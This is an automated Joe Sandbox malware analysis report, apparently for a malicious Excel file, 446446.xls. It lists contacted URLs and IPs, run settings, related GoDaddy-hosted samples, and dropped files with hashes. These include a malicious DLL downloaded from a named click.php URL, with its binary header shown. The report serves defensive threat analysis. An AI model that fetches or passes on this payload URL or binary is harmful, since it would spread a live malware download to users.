                                                                                      		high
                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                        		high
                                                                                        http://weather.service.msn.com/data.aspx7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                          		high
                                                                                          https://apis.live.net/v5.0/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                            		high
                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                              		high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                		high
                                                                                                https://management.azure.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                  		high
                                                                                                  https://wus2.contentsync.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://incidents.diagnostics.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/ios7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                      		high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                        		high
                                                                                                        https://o365auditrealtimeingestion.manage.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                            		high
                                                                                                            https://api.office.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                              		high
                                                                                                              https://incidents.diagnosticssdf.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                		high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policies7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                  		high
                                                                                                                  https://entitlement.diagnostics.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                    		high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                      		high
                                                                                                                      https://outlook.office.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                        		high
                                                                                                                        https://storage.live.com/clientlogs/uploadlocation7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                          		high
                                                                                                                          https://templatelogging.office.com/client/log7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                              		high
                                                                                                                              https://webshell.suite.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                		high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://management.azure.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://login.windows.net/common/oauth2/authorize7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://graph.windows.net/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://api.powerbi.com/beta/myorg/imports7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://devnull.onenote.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://ncus.pagecontentsync.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://messaging.office.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://augloop.office.com/v27313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://skyapi.live.net/Activity/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://clients.config.office.net/user/v1.0/mac7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://dataservice.o365filtering.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://api.cortana.ai7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://onedrive.live.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ovisualuiapp.azurewebsites.net/pbiagave/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devices7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://directory.services.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://login.windows-ppe.net/common/oauth2/authorize7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                              		high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              64.207.186.30
                                                                                                                                                              		living-traditions.comUnited States
                                                                                                                                                              		398110GO-DADDY-COM-LLCUSfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                              Analysis ID:385552
                                                                                                                                                              Start date:12.04.2021
                                                                                                                                                              Start time:17:11:27
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 7m 10s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Sample file name:446446.xls
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                                              Number of analysed new started processes analysed:30
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal96.troj.expl.evad.winXLS@5/8@2/1
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 23.1% (good quality ratio 19.2%)
                                                                                                                                                              • Quality average: 69.3%
                                                                                                                                                              • Quality standard deviation: 43.6%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 83%
                                                                                                                                                              • Number of executed functions: 3
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xls
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 92.123.150.225, 20.50.102.62, 52.147.198.201, 40.88.32.150, 52.255.188.83, 92.122.145.220, 104.42.151.234, 52.109.32.63, 52.109.12.21, 52.109.12.24, 184.30.24.56, 20.82.209.104, 92.122.213.194, 92.122.213.247, 13.107.4.50, 20.82.210.154, 52.155.217.156, 20.54.26.129
                                                                                                                                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e13551.dscg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, msagfx.live.com-6.edgekey.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, au.au-msedge.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              17:12:30API Interceptor1x Sleep call for process: rundll32.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              64.207.186.30446446.xlsGet hashmaliciousBrowse
                                                                                                                                                              • living-traditions.com/blogs/click.php

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              GO-DADDY-COM-LLCUS446446.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 64.207.186.30
                                                                                                                                                              documents-1982636004.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 107.180.50.162
                                                                                                                                                              documents-1982636004.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 107.180.50.162
                                                                                                                                                              documents-466266883.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 107.180.50.162
                                                                                                                                                              documents-466266883.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 107.180.50.162
                                                                                                                                                              Processed APR12.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 192.169.223.13
                                                                                                                                                              NdBLyH2h5d.exeGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.131.241
                                                                                                                                                              4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 107.180.50.167
                                                                                                                                                              Portfolio.exeGet hashmaliciousBrowse
                                                                                                                                                              • 72.167.241.46
                                                                                                                                                              12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.131.241
                                                                                                                                                              CIVIP-8287377.exeGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.177.1
                                                                                                                                                              MT103_004758.exeGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.131.241
                                                                                                                                                              Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.131.241
                                                                                                                                                              Swift002.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.62.160.230
                                                                                                                                                              36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.131.241
                                                                                                                                                              56UDmImzPe.dllGet hashmaliciousBrowse
                                                                                                                                                              • 107.180.90.10
                                                                                                                                                              Shipping doc&_B-Landen.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.62.137.41
                                                                                                                                                              Statement-ID261179932209970.vbsGet hashmaliciousBrowse
                                                                                                                                                              • 148.72.208.50
                                                                                                                                                              _.ryder.com._1602499153.666014.dllGet hashmaliciousBrowse
                                                                                                                                                              • 166.62.30.150
                                                                                                                                                              mW07jhVxX5.exeGet hashmaliciousBrowse
                                                                                                                                                              • 184.168.131.241

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              C:\Users\user\fdinmd.fii446446.xlsGet hashmaliciousBrowse
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick446446.xlsGet hashmaliciousBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7313A428-7830-4ECB-88E3-B5B1143EDDDA
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):133926
                                                                                                                                                                  Entropy (8bit):5.3703247507002985
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:/cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:EVQ9DQW+zYXO8
                                                                                                                                                                  MD5:9559FA6EB738D9BC9BC6833652EB4E4D
                                                                                                                                                                  SHA1:76522723B61DE9679B0D276B600E7A8860267B01
                                                                                                                                                                  SHA-256:32E6DB996EAC4915BA6F963A9406C5B611BBBF295F24C516F99E6EC1FC0316D1
                                                                                                                                                                  SHA-512:1A5ADED8BA8EE3C2783C3FEB993A3F306C5B7531F912F9A94DDBF9BF2FC7C11C670B2237694CFE0B2A1DB3F4F227FB5EFE21D00E66A7F2186F3FC51B4F43C626
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-12T15:12:24">.. Build: 16.0.14008.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                  Category:downloaded
                                                                                                                                                                  Size (bytes):449536
                                                                                                                                                                  Entropy (8bit):5.5101637778448955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                                                                                                                                                                  MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                                                                                                                                                                  SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                                                                                                                                                                  SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                                                                                                                                                                  SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: 446446.xls, Detection: malicious, Browse
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  IE Cache URL:http://living-traditions.com/blogs/click.php
                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AF910000
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80472
                                                                                                                                                                  Entropy (8bit):7.887674613462612
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:clJGmOQRbgrWGHKT7AeWRlMVGoIahaDHTU6hryF70KiQ:cbGmOQRbgrW2KT7g2sTU2yF70KiQ
                                                                                                                                                                  MD5:3806F1BA0C68ABABDAAD11C09F7E7C84
                                                                                                                                                                  SHA1:2B1B86584B11EE9407A39D88B5044E403D7ACDEF
                                                                                                                                                                  SHA-256:D65513C26BDE3DD4AE8DA9A7C16BE2540FD551D6D6674EEE7E0D9792881F99A1
                                                                                                                                                                  SHA-512:88ADF638FD18E386F539610589BD0AD96F247A149B93CC589DCE8A3BB0B79D2BA2BC737EC297E1613FA95A0A902EAB55AAB3D628FFDF7E0084D4246677E7966F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: .UKO.0..W.?D........,..G.T...=.X.<....co......<<..3.O.g.5..D.......J.e.~.^..Y.I8%.w.5 ;[.}...`Eh.-.S.?8G......"..V$z.K..\.%.......%p.N..-...{....7N.[..|./K.L...|....D.u.Lc".|..!.-E.z...^.R.y4.,{....).7.r.e...F.Oj@........-....qu....M.]Z.a.`...Rc....;....=9.T......./.\........Z.`. T!.....=>...v...6...../r..)..r_..\....\..g..SNLk....t.r/"._)...t....PQ<f.||8..#..]:s7..........h.]."..4lg....*.,;.....5...Of........PK..........!................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\446446.xls.LNK
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:46 2020, mtime=Mon Apr 12 23:12:27 2021, atime=Mon Apr 12 23:12:27 2021, length=110080, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2066
                                                                                                                                                                  Entropy (8bit):4.651416909086472
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:8/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6my/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6m:8/YmvxS8Da8HIB6p/YmvxS8Da8HIB6
                                                                                                                                                                  MD5:5AB3706D085881A1D4836C30CB8212C4
                                                                                                                                                                  SHA1:C6B634036314EA7D9308E7B10DE84E370DA37B9E
                                                                                                                                                                  SHA-256:EC254D08DEA693D4456B6DFA2E215A7C2F8798202D09A7CC81924AD883629625
                                                                                                                                                                  SHA-512:2C7E15C1EF6CFB4D129779ED69BF95F7B3FE735BF3F734276470B2097C2AFA1FCFC6CCEE0354DCA54BB77719710599715E110BEF4BEFF2E504F6AFE514CD7338
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: L..................F.... .......:...r."../..r."../...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S.....................r..h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny..R.......Y..............>.....7=..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2..R...R.. .446446.xls..F......>Qxx.R......h......................!..4.4.6.4.4.6...x.l.s.......P...............-.......O...........>.S......C:\Users\user\Desktop\446446.xls..!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.4.4.6...x.l.s.........:..,.LB.)...As...`.......X.......724471...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h...
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Mon Apr 12 23:12:27 2021, atime=Mon Apr 12 23:12:27 2021, length=12288, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):904
                                                                                                                                                                  Entropy (8bit):4.643076575571524
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:8iRcXUV3tHuElPCH2JgUxw7GhOX+WrjAZ/2bD03DLC5Lu4t2Y+xIBjKZm:8iRbt4Uxw6uAZiDMq87aB6m
                                                                                                                                                                  MD5:EF3F360D18E0AF8661AFEACCC90C95B9
                                                                                                                                                                  SHA1:C8A408AFD5B1C569A55884F34482716D9E4E5E8A
                                                                                                                                                                  SHA-256:425B362E827F53278F7D587E1EC47AFEB3B3DA2BDBDF9E440B3B696583418954
                                                                                                                                                                  SHA-512:32EE8CA8843B2E7F5B5B79680B6856A3C417484EEC79E192BB2EA131FA0DD99A67EF24173F02040115D1D4B136D27A2CF080DE19AED4C18D7C28EF3FEC9F6333
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: L..................F........N....-...W.../..h..../...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S.....................r..h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>......$.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......724471...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):83
                                                                                                                                                                  Entropy (8bit):4.062636835813932
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oyBVomMJRT3Ip273Ip2mMJRT3Ip2v:dj6J14LmJ142
                                                                                                                                                                  MD5:546FBC897E0253FD4115B55013DB9EC5
                                                                                                                                                                  SHA1:01C5E19E8AD4B7DB773765B0522E2524926CBE8E
                                                                                                                                                                  SHA-256:77F95B49BFF9A69DEC8FC0B77F48EBF54111EB7F4BDAD317A51C9A019FE250BF
                                                                                                                                                                  SHA-512:088C09B290FF9AA6E5D2BC373D19EFA034D2DF07B52A12F6B69B8B47FEA74ED6F4BD3EDDAF4B0E294E3556D752588AC7CC5B6F18B72FA391AB6091E07006D689
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..446446.xls.LNK=0..446446.xls.LNK=0..[xls]..446446.xls.LNK=0..
                                                                                                                                                                  C:\Users\user\Desktop\90A10000
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):161733
                                                                                                                                                                  Entropy (8bit):6.925925053233649
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V78rmOAIyyzElBIL6lECbgBGzP5xLm7TK2jTUqyF70virW2akHGaakHh5o78rmOQ:p8rmOAIyyzElBIL6lECbgB+P5Nm7T5UW
                                                                                                                                                                  MD5:8F620D3AB90FC12134D008C890041FDA
                                                                                                                                                                  SHA1:07FFAE23C88B756A4FA3D0C8903B996EE05A1620
                                                                                                                                                                  SHA-256:D48665C8B028E9328061DF6988465D7F5B576EE3ED3B3214EE4138CC5E3119D9
                                                                                                                                                                  SHA-512:E3430608D5E3546AB186E9C42E48B2E49245AE79750F73A39CB81F1BC005B33F6F935A6874BA099079C02360B1494C98B1765A76875D42C5876ED6EB03A36C09
                                                                                                                                                                  Malicious:false
